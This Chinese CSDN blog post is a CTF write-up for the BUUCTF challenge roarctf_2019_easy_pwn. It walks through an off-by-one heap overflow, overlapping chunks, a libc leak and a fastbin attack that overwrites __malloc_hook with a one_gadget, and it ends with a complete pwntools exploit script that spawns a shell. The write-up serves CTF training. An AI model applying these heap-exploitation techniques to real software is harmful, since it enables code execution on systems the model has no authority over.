[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)

最新推荐文章于 2024-09-27 13:29:48 发布
最新推荐文章于 2024-09-27 13:29:48 发布
阅读量2.4k 收藏 9
点赞数 4
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/111307531
版权

roarctf_2019_easy_pwn

附件

步骤:

  1. 例行检查,64位程序,保护全开
    在这里插入图片描述

  2. 试运行一下程序,看看大概的情况,经典的堆块的菜单
    在这里插入图片描述

  3. 64位ida载入,改了一下各个选项的函数名,方便看程序(按N)
    在这里插入图片描述

  4. add
    在这里插入图片描述
    edit
    在这里插入图片描述
    在这里插入图片描述
    free
    在这里插入图片描述show
    在这里插入图片描述

这道题的思路是通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改malloc_hook地址处的内容为one gadget地址

首先利用Unsorted bin泄露libc的地址
我们先申请4个chunk

add(0x18)#idx0
add(0x10)#idx1
add(0x90)#idx2
add(0x10)#idx3

此时的堆布局是这样的
在这里插入图片描述
利用off-by-one通过修改chunk0将chunk1的size改为0xa1,34是(0x18+10),用来触发off-by-one漏洞的

edit(0,34,'a'*0x10+p64(0x20)+p8(0xa1))

在这里插入图片描述
接下来编辑chunk2来让我们伪造的chunk1通过检查,堆的理想状态如下图,之前c0那行是没有数据的

edit(2,0x80,p64(0)*14+p64(0xa0)+p64(0x21))

在这里插入图片描述
之后我们释放掉chunk1,重新申请,这样我们就让new chunk 1(上图黄色标记) 和chunk 2 有重叠部分了

delete(1)
add(0x90)

但是重新申请的new chunk1 会覆写掉之前的chunk2的size
在这里插入图片描述
需要编辑一下chunk1去手动写入chunk2的size

edit(1,0x20,p64(0)*2+p64(0)+p64(0xa1))

在这里插入图片描述
现在chunk1和chunk2有重叠了,释放掉chunk2,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字段,即main_arena + offset,然后我们通过打印chunk1就能得到程序里的main_arena + offset地址,
在这里插入图片描述
动调可以知道offset=88,看一下给我们的libc里的main_arena的地址
ida打开libc,malloc_trim(),如图,libc里的main_arena的地址是0x3c4b20
在这里插入图片描述
这样就能计算出程序的偏移量了
libc_base=(程序里的main_arena+88)-0x3c4b78(0x3c4b0+88,一般2.23_64的偏移都是这个,不同libc版本会有不同)

delete(2)

show(1)
r.recvuntil("content: ")
r.recv(0x20)
libc_base=u64(r.recv(6).ljust(8,"\x00"))-0x3c4b78

show(1)往下的代码可以通过开启了context.log_level="debug"可以得到,在content之后有0x20个0,之后就是我们要接收的地址
在这里插入图片描述

我们重新申请一个chunk2

add(0x80)

在这里插入图片描述
接下来在chunk1中,伪造一个跟我们刚刚申请的new chunk2一样的chunk

edit(1,0x90,p64(0)*2+p64(0)+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21))

在这里插入图片描述
删去刚刚申请的new chunk2,看一下堆现在的布局,

delete(2)

可以看到我们已经在chunk1中伪造了一个chunk
在这里插入图片描述
接下是利用fastbin attack 任意地址写

edit(1,0x30,p64(0)*2+p64(0)+p64(0x71)+p64(malloc_hook+libc_base-0x23)*2)

堆布局
在这里插入图片描述
先看一下链表
在这里插入图片描述
为什么是malloc_hook-0x23
在这里插入图片描述
可以看到,malloc_hook-0x23的size域正好是malloc前面的某个地址的0x7f,可以达到fastbin的身躯的检测,而由于这个堆块有0x70这么大,我们只需要在申请的地址偏移0xb的地方就可以修改到malloc_hook为onegadget

接下来将malloc_hook修改为one_gadget即可,先找一下libc中的one_gadget地址
在这里插入图片描述
我一个一个试了一下都不可以,百度wp后得知需要用利用 ralloc_hook 改变栈环境达成 one_gadget 的条件,参考了这个师傅的修改方法

one_gadgets=[0x45216,0x4526a,0xf1147,0xf02a4]
edit(4,27,'a'*11+p64(libc_base+one_gadgets[2])+p64(libc_base+realloc_hook+4))

设置好one_gadget的条件后,重新申请一个chunk就可以获取shell了

完整exp

from pwn import *

#r=remote('node3.buuoj.cn',25080)
r=process('roarctf_2019_easy_pwn')
libc=ELF('./libc-2.23-64.so')
context.log_level="debug"

def add(size):
    r.recvuntil('choice: ')
    r.sendline('1')
    r.recvuntil('size:')
    r.sendline(str(size))

def edit(index,size,data):
    r.recvuntil('choice: ')
    r.sendline('2')
    r.recvuntil('index:')
    r.sendline(str(index))
    r.recvuntil('size:')
    r.sendline(str(size))
    r.recvuntil('content:')
    r.send(data)
 
def delete(index):
    r.recvuntil('choice: ')
    r.sendline('3')
    r.recvuntil('index:')
    r.sendline(str(index))
 
def show(index):
    r.recvuntil('choice: ')
    r.sendline('4')
    r.recvuntil('index:')
    r.sendline(str(index))  

malloc_hook=libc.symbols['__malloc_hook']
realloc_hook=libc.symbols['realloc']

print hex(malloc_hook)
print hex(realloc_hook)

#gdb.attach(r,"b calloc")

add(0x18)#idx0
add(0x10)#idx1
add(0x90)#idx2
add(0x10)#idx3

#gdb.attach(r)

edit(0,34,'a'*0x10+p64(0x20)+p8(0xa1))#off by one 
#gdb.attach(r)

edit(2,0x80,p64(0)*14+p64(0xa0)+p64(0x21))#by pass check 
#gdb.attach(r)

delete(1)
add(0x90)#idx1 chunk overlap

edit(1,0x20,p64(0)*2+p64(0)+p64(0xa1))

delete(2)	
show(1)

r.recvuntil("content: ")
r.recv(0x20)
libc_base=u64(r.recv(6).ljust(8,"\x00"))-0x3c4b78


print "libc_base:"+hex(libc_base)


add(0x80)

edit(1,0x90,p64(0)*2+p64(0)+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21))

delete(2)

edit(1,0x30,p64(0)*2+p64(0)+p64(0x71)+p64(malloc_hook+libc_base-0x23)*2)


add(0x60)

add(0x60)#idx4
#gdb.attach(r)

one_gadgets=[0x45216,0x4526a,0xf1147,0xf02a4]
edit(4,27,'a'*11+p64(libc_base+one_gadgets[2])+p64(libc_base+realloc_hook+4)) 
add(0x60)
r.interactive()

在这里插入图片描述

关于堆利用的手法:https://blog.csdn.net/breeze_cat/article/details/103788698
参考wp:https://www.cnblogs.com/luoleqi/p/12380696.html
修改one_gadget的方法:https://blog.csdn.net/Maxmalloc/article/details/102535427

Angel~Yan
关注
专栏目录
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 584
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 2026
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
roarctf_2019_easy_pwn
qq_42728977的博客
04-11 509
考点:extented chunk unsorted bin attach 参考链接 参考链接
BUUCTF(PWN)
最新发布
fanshaoze的博客
09-27 645
看到19行,我们知道要输入一个63十进制转换41十六进制的字符长度,然后我们看到atoi知道这里是一个偏移量,804c044开头,我们知道要输入名字的数和密码数一致才能获得flag,这里我们用到了随机生成数。因为前面我们得到了他要输入的偏移量的16进制是41,所以我用AAAA %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x。我们看了main知道了这里存在格式化字符串漏洞,我们只要将判断atoi改成system,手动输入/bin/sh字符串。
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1141
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 298
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 361
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
pwn入门:sploitfun-典型的基于堆栈的缓冲区溢出详解
EternalBurning的博客
04-12 1737
虚拟机环境:Ubuntu 14.04(x86) 本文是基于sploitfun系列教程的详细解析,sploitfun对于纯新手而言,其中有些东西还是不够详细,新手不能很好的接触到其中原理,故作此文进行补充 编译代码第一行,表示关闭ASLR(地址空间布局随机化)。kernel.randomize_va_space堆栈地址随机初始化,很好理解,就是在每次将程序加载到内存时,进程地址空间的...
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1380
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
MCTF--PWN
Jason_ZhouYetao的博客
12-06 1102
被催了好久的PWN的WP,那今天就写一下前一段时间我们校赛的PWN题的详解吧。 猜猜标志 直接输入大量的字符溢出就有标志了, 走后门吗? 做PWN嘛,第一步当然显示checksec一波,可以看到这个还是对萌新很友好的,虽然是一个64位的程序,但是什么保护措施都没有开,这样的话,方法就都可以运用了; 第二步,就是扔到对应的64位的IDA中去看一波伪代码,在函数栏发现了一个好东西...
XCTF 高校战“疫”网络安全分享赛 WEB_WP
qq_40648358的博客
03-10 2670
文章目录XCTF 高校战“疫”网络安全分享赛easy_trick_gzmtuhackmefmkqPHP-UAFnwebsqlcheckin XCTF 高校战“疫”网络安全分享赛 easy_trick_gzmtu 首先说一下这个题的脑洞确实强 打开题目后,是一个好看的博客,源码里提示?time=Y或者?time=2020 测试得存在盲注的,但是当构造payload的时候,一直是500,猜测是...
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
2301_79326813的博客
02-03 1535
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
roarctf_2019_easy_pwn 1/100
m0_57754423的博客
02-22 1518
edit chunk的功能里 存在off_by_one漏洞。 利用思路: 构造堆块重叠 然后house of sprit。 exp: from pwn import * p = process("./roarctf_2019_easy_pwn") e = ELF("./roarctf_2019_easy_pwn") libc = e.libc context.log_level = "debug" p.timeout = 0.1 def add(size): p.recvuntil("./ch
pwnroarctf_2019_easy_pwn
Nothing
12-24 2131
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
linux_pwn(3)--Chunk Extend and Overlapping&&roarctf_2019_easy_pwn
azraelxuemo的博客
03-07 3618
文章目录What is Chunk Extend and Overlappingpwn题思路例题保护机制add函数show函数delete函数edit函数开始做题准备框架调试覆盖后面一个块的大小释放堆块free验证机制尝试修改堆块开始泄露libc任意地址写总结 What is Chunk Extend and Overlapping Chunk Extend and Overlapping就是当我们可以控制chunk的header时候,通过修改原有块的头大小,产生堆块重叠 比如说原来的两个堆块都是0x21
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值